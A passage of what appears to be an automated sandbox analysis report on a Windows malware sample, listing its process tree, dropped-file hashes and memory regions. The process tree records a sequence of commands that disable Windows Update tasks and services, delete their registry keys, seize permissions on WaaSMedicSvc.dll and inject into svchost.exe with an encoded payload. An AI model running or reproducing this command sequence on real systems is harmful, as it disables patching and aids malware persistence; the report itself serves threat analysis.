"\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:3876
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:648 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2308 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:1576 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:492 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:4032 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:4168 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:3776 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
PID:3972 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:2056 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:660 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3412 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:5052 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3740 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:4992
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:3884
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:3488
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:1672
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:2720
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:4716
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:1496
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3820 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3156 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵PID:984
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "szbaropxxftnd"4⤵PID:468
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe nobuxigwk1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRSWr9mZW0WjQ8Zp6uvmLE6u5mJa6blLxbhLUBAH2hxKZE3GCzRWz6VTOS4ky/ZWzvpf5adBTHBi0MDM1UFXlmNawNolHd0MlVl2JjkrKo0+8IBLupidPfw4VI3qbSIEaOjNiyslzuuxFBXtw5wQTHqdvA1/06AdulsTvF7S9CZ4A8Sy4Wq1O5AJKhxf+h2kPC8hfzfPgguSPdtoetUnybKGcvpEw1KyQLqKZRR3oNYpLLs1uRIDGCtoJYb6L/Z8pNjJ3VfajUTTtr3r8z3YZZCANKTuiSoPlOjl6tkM6iANquYBrRF8hpln6Nj10GzyuKv+UMuzm2jHgdcYvHIWu5VlaRa+GzipqrMd7FYIb8L1ivnPjVJSFAcQao9mP+a2LZhEhzxOo5HDQEsg8YcmXYPpa9+hdhm3oG1uh7mFb059O4jTv5JEyLtG/EjmQEDO7bRt6aCjLj7IOhC23zn07XDFgQpAwUJwb86rtglkKJIskH8MKibrRcKjU17oq356JU7kC1O4ZClEwn3zxsCRn1lor2TBnRi3mZeDgcxYUODmijHGaZqebzNr1I7jL4SVnCr7zAhUZQOuUcwu9hE9annEisMbni/vsVujSP7krVJ4elJme0qyMLjG1+sNcHi9dAZIssoraCroZFOnAtDzRvGg8cN8YoS46MUZJg8mI0Qbdf+lerQajWjIr0RKGqCZQ1xuG3iMqhbzxzjTcq4uxM7rPQEaeQh5GlyVEmjDNhO57C6vRA+OIXARFB1qdlw8MDw6PYSbEDaybsTrDYknMkURm5+57KX49Z9vbhteIAPMRuGLe+W/Q7zcukixvXF9qBef2RdKXca7Y0a+ENbPI5RR7Ue6orukYCW8qTzw/BerZTIsZdz2tPAWQNXFyXLl7N5E8BYSAy+XoYlMmAfKs4TOcLZHlWWWhGyIgfM5OhjOETH5CVTW9rKt08OOu8a4/6+0wAZg/JXzeo7DOwu11rCsHec3L0DgQUQ+466weHzVOPHnW3L5/ZwHpBMq5Z6v9j9q4LEufyXIarx8xLCOPLIRdn2lD84pQ85bZL3ei/oJBWwKbDZPlGBNHM3KCQHZ8JUDZEZS+1c7xrDYOZoh2zHk7F9VGp5+nYjTp9qWyW5yE147kvpbkpYy3qliugpRUyt4qfadCe1+EBZMDESEvdXlsS6pXUycuwdRTcLuU4VNAMes2kuJ6AQd62sqz3K+/30ZZggmUkjA1tlZv9/78ksWTzWkyYVbcEaqzXPQjWTKmA35HUsDbiet5zro8iAFJxq2wjtmRLhGDHMG3rV8SduK46u0eRIjpwwPlxuY+5U3IqCJe3DIjRkOm1L2av2ZWIXcWksPSJPqVO+HXHWkVh2AAqa+5REWr3PJ3w8xR3ElAij+osV6G+/rMICH4bCSB5k8fPo9JGxVDWGwZ0EP8CzrfXB5reQKnHmmXKOlqhcxLcA8C/ooNesFvHbeNYZG+AvhXKpXNyiVZCvKNP7JHOaBUriB9z0lUzAd7GdAQHUHKMKpHNpr14eYh9dcZuf2HQ3BdYSL1w96z08fRgIdMxK6VxbCvfPZ52hFFrkNF8p6SK8teLR/IGucR/X70PbdEW4Ub2MjnDd+8QfG8AI17CfCy0Vj3ftYdsAjcPiLguH1aFFVgqi8vIymdIWmGId7uV+yQ2/YWsQj+l3zAKzzjPuiR/3M1pxXS+JgjLyjgctfA==3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
4.3MB
MD5ccaffcd12dcb30adb5250f30026ecd1e
SHA14048dc71db497f641a4f35eb00ac3c163c394978
SHA256fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
SHA512a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
-
C:\Program Files\Windows\services.exeFilesize
4.3MB
MD5ccaffcd12dcb30adb5250f30026ecd1e
SHA14048dc71db497f641a4f35eb00ac3c163c394978
SHA256fef75dbf20c3ba832b5ed9d057f26e61915501bae7c1e11c367793546c7713aa
SHA512a196e58aaff3f68e15df0de667541d103c78d0f8cf114ff3f5770444de1a30b0dc46c4d0dcafbc8bd81538660d401c57dc18de8b6b3769b81cc4e8ff7f316286
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wmo52yxe.xd4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD5b245679121623b152bea5562c173ba11
SHA147cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA25673d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA51275e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c
-
memory/468-214-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-211-0x0000017916E40000-0x0000017916E47000-memory.dmpFilesize
28KB
-
memory/468-215-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-218-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-217-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/468-216-0x000001792FF90000-0x000001792FFA0000-memory.dmpFilesize
64KB
-
memory/672-203-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-204-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-200-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-219-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-202-0x000001A6B0B60000-0x000001A6B0B80000-memory.dmpFilesize
128KB
-
memory/672-197-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-201-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-220-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-208-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-209-0x000001A6B15A0000-0x000001A6B15E0000-memory.dmpFilesize
256KB
-
memory/672-210-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-207-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-206-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/672-205-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/984-192-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/984-195-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/984-212-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/1092-135-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/1092-134-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/1092-133-0x000002622EEB0000-0x000002622F2CC000-memory.dmpFilesize
4.1MB
-
memory/1092-136-0x00000262312C0000-0x00000262312D0000-memory.dmpFilesize
64KB
-
memory/2408-169-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2408-196-0x000001976BB90000-0x000001976BBA2000-memory.dmpFilesize
72KB
-
memory/2408-167-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2408-168-0x000001976B220000-0x000001976B230000-memory.dmpFilesize
64KB
-
memory/2952-186-0x00000218DF690000-0x00000218DF6AA000-memory.dmpFilesize
104KB
-
memory/2952-171-0x00000218DDA70000-0x00000218DDA80000-memory.dmpFilesize
64KB
-
memory/2952-185-0x00000218DF220000-0x00000218DF22A000-memory.dmpFilesize
40KB
-
memory/2952-184-0x00007FF3FF1D0000-0x00007FF3FF1E0000-memory.dmpFilesize
64KB
-
memory/2952-183-0x00000218DF670000-0x00000218DF68C000-memory.dmpFilesize
112KB
-
memory/2952-182-0x00000218DF210000-0x00000218DF21A000-memory.dmpFilesize
40KB
-
memory/2952-181-0x00000218DF430000-0x00000218DF44C000-memory.dmpFilesize
112KB
-
memory/2952-187-0x00000218DF650000-0x00000218DF658000-memory.dmpFilesize
32KB
-
memory/2952-170-0x00000218DDA70000-0x00000218DDA80000-memory.dmpFilesize
64KB
-
memory/2952-188-0x00000218DF660000-0x00000218DF666000-memory.dmpFilesize
24KB
-
memory/2952-189-0x00000218DF6B0000-0x00000218DF6BA000-memory.dmpFilesize
40KB
-
memory/3164-149-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-148-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-147-0x000002AFF3FD0000-0x000002AFF3FE0000-memory.dmpFilesize
64KB
-
memory/3164-137-0x000002AFF3FA0000-0x000002AFF3FC2000-memory.dmpFilesize
136KB